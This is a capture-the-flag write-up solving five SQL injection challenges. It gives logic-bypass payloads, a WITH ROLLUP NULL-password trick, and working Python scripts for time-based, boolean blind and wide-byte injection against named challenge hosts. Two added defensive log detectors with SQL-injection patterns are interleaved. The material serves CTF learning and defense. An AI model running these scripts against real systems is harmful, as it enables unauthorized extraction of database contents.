【1】 The challenge is said to filter everything, but testing shows that keywords such as "\"|and|left|right" are not filtered. The important point is that whether the injected SQL statement is valid or not, the same page is always returned; every method tried gives the same result.

So it can only be a logic bypass. The verification code is presumably something like

select * from *** where username ="" and password="";

Neither a username nor a password is known. At a loss, I stared at it for a long time.

Bypassed successfully:

username=hello"=" & password = hello"="

Got the flag. The condition becomes username="hello"="", which MySQL evaluates as (username="hello")="", i.e. 0="", and because the empty string is cast to 0 that comparison is true, so the WHERE clause matches whatever the stored values are.

【2】 Time-based injection via X-Forwarded-For (XFF), no filtering

' or sleep(10) and ''='

The response is delayed, so injection is present.

' or sleep((select length(flag) from flag)=32) and ''='

Confirms that the flag length is 32.

Straight to the code.

#coding:utf-8
"""
@author: elope
"""
import requests

url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
maystr = "0987654321qwertyuiopasdfghjklzxcvbnm."
flag = ''
for j in range(1, 33):  # SUBSTRING positions are 1-based; the flag is 32 characters long
    for i in maystr:
        header = {
            # "X-Forwarded-For": "' +(select case when (substring((select database())from %s for 1)='%s') then sleep(5) else 0 end) and 'Zkkp'='Zkkp" % (j, i)  # enumerate the database name
            # "X-Forwarded-For": "' +(select case when (substring((select(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))) from %s for 1)='%s') then sleep(5) else 0 end) and 'Zkkp'='Zkkp" % (j, i)  # enumerate table names
            # "X-Forwarded-For": "' +(select case when (substring((select(select(group_concat(column_name))from(information_schema.columns)where(table_name=0x666C6167))) from %s for 1)='%s') then sleep(5) else 0 end) and 'Zkkp'='Zkkp" % (j, i)  # enumerate column names
            "X-Forwarded-For": "' +(select case when (substring((select flag from flag) from %s for 1)='%s') then sleep(5) else 0 end) and 'Zkkp'='Zkkp" % (j, i)  # enumerate the record
        }
        try:
            # A matching character makes the server sleep(5); the 4 s client timeout turns that into an exception
            res = requests.get(url, headers=header, timeout=4).text
        except requests.exceptions.Timeout:
            flag += i
            print(flag)
            break
        # print(res)

This script double-checks every candidate; it is slower, but somewhat more accurate.

import requests
import time

url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
maystr = "0987654321qwertyuiopasdfghjklzx{_-%!@&*^(?|)}cvbnm."
flag = ''

for i in range(1, 33):  # SUBSTRING positions are 1-based; the flag is 32 characters long
    for j in maystr:
        headers = {"X-Forwarded-For": "' +(select case when (substring((select flag from flag) from %s for 1)='%s') then sleep(15) else 0 end) and 'Zkkp'='Zkkp" % (i, j)}
        starttime = time.time()
        requests.get(url, headers=headers)
        if time.time() - starttime > 10:
            # Repeat the request with a fresh timer so a one-off slow response is not taken as a match
            starttime = time.time()
            requests.get(url, headers=headers)
            if time.time() - starttime > 10:
                flag += j
                print(flag)
                break

The result comes out directly.

【3】 Forcing the password to be empty

Straight to the challenge source.
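As an added defensive counterpart, not part of the original writeup: both scripts above put SQL into the X-Forwarded-For header and use the server's sleep() as a timing oracle, which leaves a recognisable trace in a web log. This Python detector parses constructed log lines (the log format, field names, the assumption that the raw header is logged and the 3 s threshold are all assumptions) and flags requests whose XFF value is not an address list, carries SQL fragments, or is slow in step with a sleep() call.

```python
import re

# Constructed access-log lines (not from the original post): client, path,
# the X-Forwarded-For header value the app logged, and response time in seconds.
SAMPLE_LOG = """\
10.0.0.5 "/web/wonderkun/index.php" xff="203.0.113.7" rt=0.041
10.0.0.5 "/web/wonderkun/index.php" xff="198.51.100.2, 203.0.113.7" rt=0.039
10.0.0.9 "/web/wonderkun/index.php" xff="' or sleep(10) and ''='" rt=10.02
10.0.0.9 "/web/wonderkun/index.php" xff="' +(select case when (substring((select flag from flag) from 1 for 1)='a') then sleep(5) else 0 end) and 'Zkkp'='Zkkp" rt=0.044
10.0.0.9 "/web/wonderkun/index.php" xff="' +(select case when (substring((select flag from flag) from 1 for 1)='c') then sleep(5) else 0 end) and 'Zkkp'='Zkkp" rt=5.03
""".splitlines()

LOG_RE = re.compile(r'^(\S+) "([^"]*)" xff="(.*)" rt=([\d.]+)$')
# A well-formed X-Forwarded-For is a comma-separated list of addresses (IPv4 only here).
IP_LIST = re.compile(r"^\s*\d{1,3}(?:\.\d{1,3}){3}(?:\s*,\s*\d{1,3}(?:\.\d{1,3}){3})*\s*$")
# Fragments a proxy header never needs: timing primitives, CASE expressions, 'x'='x tautologies.
SQL_HINTS = re.compile(r"sleep\s*\(|case\s+when|substring\s*\(|'[^']*'\s*=\s*'", re.I)
SLOW_SECONDS = 3.0  # assumed threshold; tune to the endpoint's normal latency

def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    client, path, xff, rt = m.groups()
    return {"client": client, "path": path, "xff": xff, "rt": float(rt)}

def classify(entry):
    """Return the list of reasons this request looks like header-based SQL injection."""
    reasons = []
    if not IP_LIST.match(entry["xff"]):
        reasons.append("xff-not-ip-list")
    if SQL_HINTS.search(entry["xff"]):
        reasons.append("sql-fragment-in-xff")
    # A slow response is only evidence when the header also carries sleep().
    if entry["rt"] >= SLOW_SECONDS and re.search(r"sleep\s*\(", entry["xff"], re.I):
        reasons.append("sleep-correlated-delay")
    return reasons

def analyze(lines):
    alerts = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if reasons:
            alerts.append((entry["client"], entry["rt"], reasons))
    return alerts
```

The first two lines are benign traffic through two proxies and produce no alert; the third and fifth show the delay that matches the sleep() in the header, and the fourth is a non-matching probe that is still caught by the header content alone.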

<?php
error_reporting(0);

if (!isset($_POST['uname']) || !isset($_POST['pwd'])) {
    echo '<form action="" method="post">'."<br/>";
    echo '<input name="uname" type="text"/>'."<br/>";
    echo '<input name="pwd" type="text"/>'."<br/>";
    echo '<input type="submit" />'."<br/>";
    echo '</form>'."<br/>";
    echo '<!--source: source.txt-->'."<br/>";
    die;
}

function AttackFilter($StrKey,$StrValue,$ArrReq){  
    if (is_array($StrValue)){
        $StrValue=implode($StrValue);
    }
    if (preg_match("/".$ArrReq."/is",$StrValue)==1){   
        print "水可载舟,亦可赛艇!";
        exit();
    }
}

$filter = "and|select|from|where|union|join|sleep|benchmark|,|\(|\)";
foreach($_POST as $key=>$value){ 
    AttackFilter($key,$value,$filter);
}

$con = mysql_connect("XXXXXX","XXXXXX","XXXXXX");
if (!$con){
    die('Could not connect: ' . mysql_error());
}
$db="XXXXXX";
mysql_select_db($db, $con);
$sql="SELECT * FROM interest WHERE uname = '{$_POST['uname']}'";
$query = mysql_query($sql); 
if (mysql_num_rows($query) == 1) { 
    $key = mysql_fetch_array($query);
    if($key['pwd'] == $_POST['pwd']) {
        print "CTF{XXXXXX}";
    }else{
        print "亦可赛艇!";
    }
}else{
    print "一颗赛艇!";
}
mysql_close($con);
?>

Bypassing the username check is easy: use uname = ' or 1=1 limit 1#

so that exactly one row is returned and that check passes.

But the password submitted must equal the password read from the database. That sounds pointless: if they were the same, we would already have it.

if($key['pwd'] == $_POST['pwd'])

Looking at this line: what if the password read from the database is made empty? PHP's loose == comparison treats a NULL pwd as equal to the empty string submitted in the form.

Check how many users there are:

select * from test limit 1 offset 1; normal

select * from test limit 1 offset 2; error

So there are only two rows.

Now a NULL value has to be constructed: GROUP BY pwd WITH ROLLUP appends a summary row in which pwd is NULL, and OFFSET 2 selects that third row.

Success.

Enter uname = admin' or 1=1 group by pwd with rollup limit 1 offset 2#&pwd=(empty) directly

and the flag is returned.

【4】 A straightforward blind injection

Code directly:

import requests

flag = ""

for i in range(1, 30):
    for j in range(33, 127):  # printable ASCII
        url = ("http://ctf5.shiyanbar.com/web/index_3.php?id=1'and if(ascii(substr((select flag from flag),"
               + str(i) + ",1))=" + str(j) + ",1,0)%23")
        res = requests.get(url)
        # A true condition renders the normal page, which contains 'Hello'
        if 'Hello' in res.text:
            flag += chr(j)
            print(flag)
            break

【5】 An NJCTF problem

Spaces are filtered, and a double-byte (wide-byte) encoding is in play. Single quotes are escaped while double quotes are taken as plain characters, so the comparison value is hex-encoded to bypass the filter.

import binascii
import requests

s = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~"
u = "http://218.2.197.235:23733/index.php?key=a%df'||right(left((select(flag)from(flag)),{pos}),1)=0x{c}%23"
payload = ''
for i in range(1, 35):
    for c in s:
        # Compare against a hex literal, since quotes are escaped and spaces are filtered
        url = u.format(pos=i, c=binascii.hexlify(c.encode()).decode())
        r = requests.get(url)
        if 'showContent' in r.text:
            payload += c
            print(payload)
            break
    if payload.endswith('}'):  # closing brace of the flag
        break
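The index_3.php script in 【4】 and the NJCTF script in 【5】 both recover the flag one character at a time by repeating the same request with only a position and a character literal changed. Added here as a defender's example, not from the original post: a Python detector that collapses those varying literals into a request template and flags a client that sends many probes of one template in a short window; the request records, the threshold of four variants and the 60 s window are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed request records (epoch seconds, client, request target); not from the post.
SAMPLE_LOG = [
    (1000.0, "10.0.0.9", "/web/index_3.php?id=1'and if(ascii(substr((select flag from flag),1,1))=65,1,0)%23"),
    (1000.3, "10.0.0.9", "/web/index_3.php?id=1'and if(ascii(substr((select flag from flag),1,1))=66,1,0)%23"),
    (1000.6, "10.0.0.9", "/web/index_3.php?id=1'and if(ascii(substr((select flag from flag),1,1))=67,1,0)%23"),
    (1000.9, "10.0.0.9", "/web/index_3.php?id=1'and if(ascii(substr((select flag from flag),2,1))=65,1,0)%23"),
    (1002.0, "10.0.0.9", "/index.php?key=a%df'||right(left((select(flag)from(flag)),1),1)=0x30%23"),
    (1002.3, "10.0.0.9", "/index.php?key=a%df'||right(left((select(flag)from(flag)),1),1)=0x31%23"),
    (1002.6, "10.0.0.9", "/index.php?key=a%df'||right(left((select(flag)from(flag)),1),1)=0x32%23"),
    (1002.9, "10.0.0.9", "/index.php?key=a%df'||right(left((select(flag)from(flag)),2),1)=0x30%23"),
    (1005.0, "10.0.0.5", "/web/index_3.php?id=1"),
    (1009.0, "10.0.0.5", "/web/index_3.php?id=2"),
]

# Functions a character oracle needs: they slice the secret one character at a time.
ORACLE_FN = re.compile(r"\b(?:ascii|ord|substr|substring|mid|left|right)\s*\(")

def template(target):
    """Collapse the literals an enumerator varies so every probe maps to one key."""
    q = unquote(target).lower()
    q = re.sub(r"0x[0-9a-f]+", "HEX", q)  # hex-encoded characters (the NJCTF script)
    return re.sub(r"\d+", "N", q)          # positions and ASCII codes (the index_3 script)

def detect(events, min_variants=4, window=60.0):
    """Flag (client, template) pairs with >= min_variants probes inside `window` seconds."""
    buckets = defaultdict(list)
    for ts, client, target in events:
        buckets[(client, template(target))].append(ts)
    alerts = []
    for (client, tmpl), times in buckets.items():
        times.sort()
        for i in range(len(times)):
            j = i
            while j < len(times) and times[j] - times[i] <= window:
                j += 1
            if j - i >= min_variants:
                alerts.append({"client": client, "template": tmpl, "count": j - i,
                               "oracle_fn": bool(ORACLE_FN.search(tmpl))})
                break
    return alerts
```

The two ordinary requests from 10.0.0.5 share a template too, but never reach the threshold, while each of the two probe series from 10.0.0.9 does and additionally names a character-slicing function.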